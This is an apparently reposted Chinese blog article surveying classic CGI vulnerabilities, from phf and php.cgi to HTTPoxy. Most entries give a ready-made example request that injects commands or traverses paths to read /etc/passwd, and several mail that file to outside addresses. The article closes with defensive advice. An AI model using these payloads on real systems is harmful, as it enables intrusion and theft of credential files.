CGI漏洞是指Common Gateway Interface(公用网关接口)在Web服务器与客户端交互中存在的安全漏洞,以下是一些常见的CGI漏洞及其详细描述:
1、phf漏洞
描述:phf漏洞是最经典的CGI漏洞之一,可以执行服务器的命令,如显示/etc/passwd。
示例:lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
2、php.cgi漏洞
描述:早期版本的PHP CGI存在漏洞,可以读取nobody权限的所有文件。
示例:lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
3、whois_raw.cgi漏洞
描述:该漏洞允许攻击者执行命令。
示例:lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
4、faxsurvey漏洞
描述:该漏洞允许攻击者执行命令。
示例:lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
5、textcounter.pl漏洞
描述:如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令。
示例:使用Perl脚本执行命令并发送邮件。
6、info2www漏洞
描述:某些版本的info2www存在漏洞,可以通过特殊请求执行命令。
示例:$REQUEST_METHOD=GET ./info2www '(../../../../../../../../bin/mail jami</etc/passwd|)'
7、pfdispaly.cgi漏洞
描述:该漏洞允许攻击者执行命令。
示例:lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
8、wrap漏洞
描述:该漏洞允许攻击者访问服务器上的文件。
示例:lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc
9、www-sql漏洞
描述:该漏洞允许攻击者绕过认证访问受限制的页面。
示例:http://your.server/cgi-bin/www-sql/protected/something.html:
10、view-source漏洞
描述:该漏洞允许攻击者查看服务器上的敏感文件。
示例:lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd
11、campas漏洞
描述:该漏洞允许攻击者执行命令。
示例:lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
12、webgais漏洞
描述:该漏洞允许攻击者通过POST请求执行命令。
示例:telnet www.victim.com 80 POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 query=';mail+drazvan/@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
13、websendmail漏洞
描述:该漏洞允许攻击者通过POST请求发送邮件。
示例:telnet www.victim.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx receiver=;mail+your_address/@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
14、handler漏洞
描述:IRIX系统的handler程序存在缓存溢出错误,允许远程执行程序。
示例:telnet www.victim.com 80 GET /cgi-bin/handler/useless
15、HTTPoxy漏洞(CVE-2016-5385)
描述:该漏洞影响多种CGI或FastCGI运行的程序,可能导致请求被恶意代理服务器拦截。
原理:根据RFC 3875规定,CGI程序在处理环境变量时存在问题,导致HTTP_PROXY环境变量被不当处理。
复现步骤:设置BurpSuit代理,构造包含Proxy字段的HTTP请求,验证代理是否生效。
CGI漏洞涉及多种类型,包括配置错误、边界条件错误、访问验证错误等,这些漏洞可能导致敏感信息泄露、远程命令执行等严重后果,建议定期审核和更新CGI程序,避免使用不必要的程序,并采取适当的安全措施来保护Web服务器免受攻击。
小伙伴们,上文介绍.cgi漏洞的内容,你了解清楚吗?希望对你有所帮助,任何问题可以给我留言,让我们下期再见吧。
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/87272.html